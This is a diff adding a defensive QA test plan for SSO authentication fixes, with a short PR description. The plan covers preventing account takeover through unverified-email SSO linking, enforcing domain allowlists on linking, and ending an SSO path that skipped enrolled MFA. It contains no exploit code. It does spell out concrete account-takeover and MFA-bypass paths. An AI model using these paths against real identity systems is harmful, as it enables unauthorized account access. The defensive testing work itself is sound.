+- **Type:** negative / defense-in-depth (the resolution's key "insufficient layer-1-alone" case).
+
+### SSO-I-03 — account with a non-password authenticator (TOTP/WebAuthn) also refuses silent SSO adoption
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** seed an account that has an enrolled TOTP (no password, or password + TOTP); new
+  (provider,uid) asserts its email, verified.
+- **Action:** `post_sso_callback`.
+- **Expected:** `account_has_other_authenticators?` true → no silent link; explicit-link redirect.
+- **Type:** negative / edge.
+
+### SSO-I-04 — returning PURE-SSO user keyed by (provider,uid) logs in
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** seed a pure-SSO account already linked to `(oidc, uid=U1)`, no password.
+- **Action:** `post_sso_callback` with the SAME `(oidc, U1)` and matching verified email.
+- **Expected:** logs in successfully (identity-keyed path via `_account_from_omniauth_identity` is
+  unaffected by the A1 change). No explicit-link redirect.
+- **Type:** happy-path / regression (must NOT break returning SSO users).
+
+### SSO-I-05 — first-time SSO + verified email + NO existing account → creates account under domain policy
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** no pre-existing account for `new@corp.com`; allowlist permits `corp.com`;
+  `email_verified: true`, trusted provider.
+- **Action:** `post_sso_callback`.
+- **Expected:** a NEW account + Customer is created (JIT, `provisioning_origin: 'sso_jit'`); user logged
+  in; identity row written for (provider,uid). Honors `before_omniauth_create_account` domain check.
+- **Type:** happy-path.
+
+### SSO-I-06 — pure-SSO account adoption allowed only when no other authenticators exist
+- **Layer:** integration / unit
+- **Target:** `apps/web/auth/spec/unit/account_has_other_authenticators_spec.rb` (new) + integration.
+- **Preconditions:** account with password → true; account with TOTP only → true; account with neither
+  (pure-SSO) → false.
+- **Action:** call `account_has_other_authenticators?`.
+- **Expected:** matches the table above. Drives the SSO-I-01..04 branch decisions.
+- **Type:** unit / boundary.
+
+---
+
+## 3. A4 — domain allowlist enforced on the LINKING path (not just create)
+
+### SSO-I-07 — allowlist=`corp.com`; SSO `user@evil.com` matching an existing account → NOT linked, blocked
+- **Layer:** integration
+- **Target file:** `apps/web/auth/spec/integration/full/omniauth_domain_linking_spec.rb` (new) — companion
+  to the existing `omniauth_domain_restriction_spec.rb` (which covers the CREATE path).
+- **Preconditions:** `configure_allowed_domains(['corp.com'])`; seed an existing account `user@evil.com`
+  (or one whose email the IdP asserts); callback asserts `email=user@evil.com`, verified.
+- **Action:** `post_sso_callback`.
+- **Expected:** `omniauth_email_domain_allowed?` false → no account resolved → blocked, NOT linked;
+  `domain_not_allowed` redirect (generic, no domain disclosure).
+- **Type:** **negative — PRIMARY A4 gate (linking path).**
+
+### SSO-I-08 — allowlist empty/unset → no domain restriction on linking (unchanged)
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** `configure_allowed_domains(nil)`.
+- **Action:** callback for any domain (otherwise valid + verified, returning pure-SSO user).
+- **Expected:** not blocked by domain policy.
+- **Type:** edge / regression (no over-blocking).
+
+### SSO-I-09 — disallowed domain with only Tier-2 claims → blocked (no link, no create), keeps `invalid_email`
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** allowlist=`corp.com`; `info.email` nil, only `preferred_username`/`upn` present.
+- **Action:** `post_sso_callback`.
+- **Expected:** resolves to no verified Tier-1 email → blocked before any domain/link decision → the
+  existing `invalid_email` redirect (default-deny; do NOT fall through to Tier-2). Consistent with
+  `omniauth_missing_email_spec.rb:291-319`.
+- **Type:** negative / default-deny.
+
+### SSO-I-10 — domain decision uses the VERIFIED Tier-1 email, not a spoofable Tier-2 value
+- **Layer:** integration / unit
+- **Target:** `omniauth_domain_linking_spec.rb`.
+- **Preconditions:** `info.email` blank/untrusted; Tier-2 `upn=admin@corp.com` (would pass allowlist if
+  used). Allowlist=`corp.com`.
+- **Action:** `post_sso_callback`.
+- **Expected:** the Tier-2 `corp.com` value is NOT used to satisfy the allowlist → blocked. (A4 depends on
+  A1 layer-1.)
+- **Type:** negative / boundary (spoof prevention).
+
+### SSO-I-11 — existing CREATE-path domain restriction still enforced (defense-in-depth retained)
+- **Layer:** integration
+- **Target:** keep/extend `omniauth_domain_restriction_spec.rb`.
+- **Action:** re-run the creation-path domain tests after the helper centralization.
+- **Expected:** `before_omniauth_create_account` still rejects disallowed domains (the duplicate check is
+  kept as defense-in-depth, not removed).
+- **Type:** regression.
+
+---
+
+## 4. A2 — MFA NOT bypassed via SSO when a second factor is enrolled
+
+> ⚠️ CRITICAL CONFLICT: the CURRENT code (`detect_mfa_requirement.rb:151-156`,
+> `return false if @via_omniauth` → reason `sso_bypass`, added for issue #3114) and the CURRENT spec
+> (`detect_mfa_requirement_spec.rb:88-126`) BOTH ENCODE THE OLD BEHAVIOUR that A2 reverses. These specs
+> will FAIL after the A2 fix and MUST be rewritten, not merely added to. Prescriptions below replace those
+> examples. See Risk R1.
+
+### SSO-U-08 — via_omniauth + enrolled OTP → MFA STILL REQUIRED (reverses old `sso_bypass`)
+- **Layer:** unit
+- **Target file:** `apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb` (REWRITE the SSO section)
+- **Preconditions:** `via_omniauth: true`, `has_otp_secret: true`, no IdP step-up asserted.
+- **Action:** `DetectMfaRequirement.call(...)`.
+- **Expected:** `requires_mfa?` == **true** (federation is the FIRST factor; local second factor still
+  required). Reason is no longer `sso_bypass` (e.g. `otp_configured`/`mfa_required_via_sso`).
+- **Type:** **regression-reversal — PRIMARY A2 gate.** Replaces the old line-89 example that asserted
+  `false`/`sso_bypass`.
+
+### SSO-U-09 — via_omniauth + IdP step-up credit ONLY when explicitly configured (`amr`/`acr`)
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** new inputs the fix adds — `trust_idp_mfa: true` + asserted `amr: ['mfa']`
+  (or matching `acr`).
+- **Action:** `DetectMfaRequirement.call(via_omniauth: true, idp_amr: ['mfa'], trust_idp_mfa: true, ...)`.
+- **Expected:** second factor treated as satisfied (`mfa_satisfied`/`idp_step_up`). Local MFA challenge
+  skipped — but ONLY because step-up was explicitly trusted.
+- **Type:** edge / opt-in happy path.
+
+### SSO-U-10 — `amr: ['pwd']` (no MFA) with trust_idp_mfa on → STILL challenged
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** `trust_idp_mfa: true`, `amr: ['pwd']` (IdP did NOT step up), OTP enrolled.
+- **Action:** call.
+- **Expected:** `requires_mfa?` true (credit granted only for genuine MFA amr/acr values).
+- **Type:** negative.
+
+### SSO-U-11 — step-up NEVER inferred from mere presence of SSO (trust_idp_mfa off / default)
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** `via_omniauth: true`, `amr: ['mfa']` asserted BUT `trust_idp_mfa` off (default).
+- **Action:** call.
+- **Expected:** OTP-enrolled account → still required. Default is "always force local MFA"; amr/acr
+  credit is off by default.
+- **Type:** negative / default-secure.
+
+### SSO-U-12 — no second factor enrolled → SSO logs in directly (unchanged)
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** `via_omniauth: true`, no OTP, no recovery codes, no `:required` policy.
+- **Action:** call.
+- **Expected:** `requires_mfa?` false. Accounts without MFA are not newly blocked.
+- **Type:** happy-path / regression.
+
+### SSO-I-12 — integration: SSO login on a TOTP-enrolled account lands in `awaiting_mfa`, second factor required
+- **Layer:** integration
+- **Target file:** `apps/web/auth/spec/integration/full/omniauth_mfa_spec.rb` (new)
+- **Preconditions:** seed a pure-SSO (or properly linked) account WITH TOTP enrolled; MFA feature enabled
+  (`AUTH_MFA_ENABLED=true`); valid verified callback for that (provider,uid).
+- **Action:** `post_sso_callback`; inspect resulting auth state.
+- **Expected:** session is in the partial-auth `awaiting_mfa` state (NOT fully logged in); the OTP
+  challenge is presented; full session sync deferred (`defer_session_sync?`). Mirrors password-login MFA.
+- **Type:** integration / regression-reversal.
+
+### SSO-I-13 — integration: SSO login with `trust_idp_mfa` + `amr=['mfa']` → fully logged in, no challenge
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** TOTP-enrolled account; provider configured `trust_idp_mfa: true`; callback raw_info
+  carries `amr: ['mfa']` (and/or configured high `acr`).
+- **Action:** `post_sso_callback`.
+- **Expected:** fully authenticated, no `awaiting_mfa`. Opt-in credit honored end to end.
+- **Type:** edge / opt-in integration.
+
+---
+
+## 5. Cross-cutting / preserved behaviour
+
+### SSO-I-14 — missing-email Tier-2-only case keeps the `invalid_email` redirect (no #3478 regression)
+- **Layer:** integration
+- **Target:** keep `apps/web/auth/spec/integration/full/omniauth_missing_email_spec.rb`; add an explicit
+  cross-reference example asserting it still holds AFTER #3499/A1 land.
+- **Preconditions:** `info.email` nil; `preferred_username`/`upn` present (per
+  `omniauth_missing_email_spec.rb:291-319`).
+- **Action:** `post_sso_callback`.
+- **Expected:** 302 → `/signin?auth_error=invalid_email` (NOT a Tier-2 fallback, NOT a 500/hang). The
+  #3478 "fail closed and loudly" contract is preserved; the resolution explicitly keeps these
+  expectations rather than flipping them.
+- **Type:** regression.
+
+### SSO-E-01 — e2e: takeover attempt shows the explicit-link message, no session granted
+- **Layer:** e2e (Playwright)
+- **Target file:** `e2e/auth/sso-account-linking.spec.ts` (new); structure per
+  `e2e/auth/sso-missing-email.spec.ts`.
+- **Preconditions:** seeded password account; mock IdP callback asserting that email, unverified.
+- **Action:** drive the SSO callback in-browser.
+- **Expected:** lands on signin with the "account exists, sign in and link from settings" message; no
+  authenticated cookie/session; no redirect into the app.
+- **Type:** e2e / negative.
+
+---
+
+## Coverage matrix — acceptance criteria → test IDs
+
+| # | Acceptance criterion | Source | Test IDs |
+|---|---|---|---|
+| AC1 | Tier-1 resolution (`info.email` → `raw_info["mail"]`) | #3499 | SSO-U-01, SSO-U-02 |
+| AC2 | Tier-2 (`upn`/`preferred_username`) excluded | #3499 | SSO-U-03, SSO-I-10 |
+| AC3 | Verified-email gate (true / false / absent) | A1/#3499 | SSO-U-04, SSO-U-05, SSO-U-06, SSO-U-07 |
+| AC4 | Takeover regression: new (provider,uid) + existing password acct + unverified → no login, not linked, explicit-link | A1 | SSO-I-01, SSO-E-01 |
+| AC5 | Tenant `email_verified:true` still no silent merge (Layer 2) | A1 | SSO-I-02, SSO-I-03 |
+| AC6 | Returning pure-SSO user by (provider,uid) logs in | A1 | SSO-I-04 |
+| AC7 | First-time SSO + verified + no existing acct → creates under domain policy | A1 | SSO-I-05 |
+| AC8 | `account_has_other_authenticators?` boundary | A1 | SSO-I-06 |
+| AC9 | Domain allowlist enforced on the LINKING path | A4 | SSO-I-07, SSO-I-10 |
+| AC10 | Allowlist empty → no restriction | A4 | SSO-I-08 |
+| AC11 | Disallowed domain w/ Tier-2 only → blocked | A4 | SSO-I-09 |
+| AC12 | Create-path domain check retained (defense-in-depth) | A4 | SSO-I-11 |
+| AC13 | MFA NOT bypassed via SSO when 2nd factor enrolled (`awaiting_mfa`) | A2 | SSO-U-08, SSO-I-12 |
+| AC14 | IdP step-up credit ONLY when explicitly configured (amr/acr) | A2 | SSO-U-09, SSO-I-13 |
+| AC15 | Step-up never inferred from SSO alone | A2 | SSO-U-10, SSO-U-11 |
+| AC16 | No-second-factor SSO logs in directly (unchanged) | A2 | SSO-U-12 |
+| AC17 | Tier-2-only missing email keeps `invalid_email` | #3478/A1 | SSO-I-14 |
+
+## Gaps / risks flagged
+
+- **R1 (CRITICAL): A2 directly reverses shipped behaviour AND an existing passing spec.** Today
+  `detect_mfa_requirement.rb` returns `false`/`sso_bypass` for `via_omniauth` (issue #3114), and
+  `apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb:88-126` ASSERTS that. After the A2 fix those
+  examples will fail. The plan REWRITES that SSO section (SSO-U-08..12). Whoever lands A2 must update the
+  existing spec in the same PR; otherwise CI is red and the temptation is to "fix" by reverting A2.
+  Highest-attention item. The `via_omniauth` short-circuit comment ("project policy: SSO ignores MFA")
+  must also be removed/updated.
+- **R2: New helper/config surface is unspecified.** `email_claim_verified?` provider table,
+  `provider_guarantees_verified_email?`, `trust_idp_mfa`, allowed `acr` values, and the `amr` plumbing do
+  not exist yet. SSO-U-06/07/09/10/11 and SSO-I-13 assume input shapes; confirm exact param names when
+  #3499/A2 land and adjust. Mark as a soft gap until the helper signatures are fixed.
+- **R3: `account_identities` keying lives in the rodauth-omniauth fork.** Asserting "identity NOT linked"
+  (SSO-I-01) requires inspecting the `account_identities` table/ds. Use the fork's
+  `omniauth_account_identities_ds` rather than guessing the schema; provide a `linked_identities(account)`
+  test helper.
+- **R4: explicit-link redirect target is not pinned.** A1 sketches
+  `set_omniauth_error :requires_explicit_link` + `login_required_error_flash` but the actual
+  query-param/route the SPA consumes isn't fixed. SSO-I-01/SSO-E-01 assert "no session + a distinguishable
+  link-required signal"; tighten the exact `auth_error=` code once implemented.
+- **R5: Full-mode integration prerequisites.** All `*-I-*` examples need `ORGS_SSO_ENABLED=true` at process
+  start (ERB timing — can't set it in `before`), `AUTHENTICATION_MODE=full`, AUTH_DATABASE_URL, Valkey on
+  the test port, and `enable_platform_fallback`/`configure_allowed_domains` from
+  `omniauth_missing_email_spec.rb`. Without ORGS_SSO_ENABLED the SSO routes don't register and every
+  example self-skips (false green). Add an explicit "routes registered" assertion in `before(:all)` like
+  the mount assertion in the missing-email spec, so a misconfigured CI fails loudly instead of skipping.
+- **R6: MFA-enrolled SSO seeding.** SSO-I-12/13 need an account that is BOTH SSO-linked AND TOTP-enrolled.
+  Building that state in full mode is non-trivial; prescribe a support helper and consider proving the
+  decision at the unit layer (SSO-U-08..12) as the authoritative gate, with the integration tests as
+  confirmation.
+- **R7: `omniauth_verify_account? true` interaction.** The fork auto-verifies omniauth accounts; A1's
+  verification gate must compose with `omniauth_verify_account?`. Add a note/assertion that turning the
+  verified-email gate on does not accidentally leave `omniauth_verify_account?` trusting an unverified
+  claim for the email column.


### PR DESCRIPTION
## Summary
- Full 2026-06-22 security assessment: findings, risk register, PoCs, and prescribed resolutions for Critical/High/Medium/Low issues (auth, authz, crypto, API, SPA, supply-chain).
- QA test-case prescriptions (74 cases) and ready-to-open PR descriptions for the C1 and S1/S2 fixes.
- 2026-06-24 independent re-verification pass, with corrected-fix callouts applied to 13 resolution docs where the original fix was found unsound or incomplete on re-check.

## Test plan
- Docs-only change; no code paths affected.
- Content has already been through its own re-verification pass (see `.../assessment-2026-06-22/`).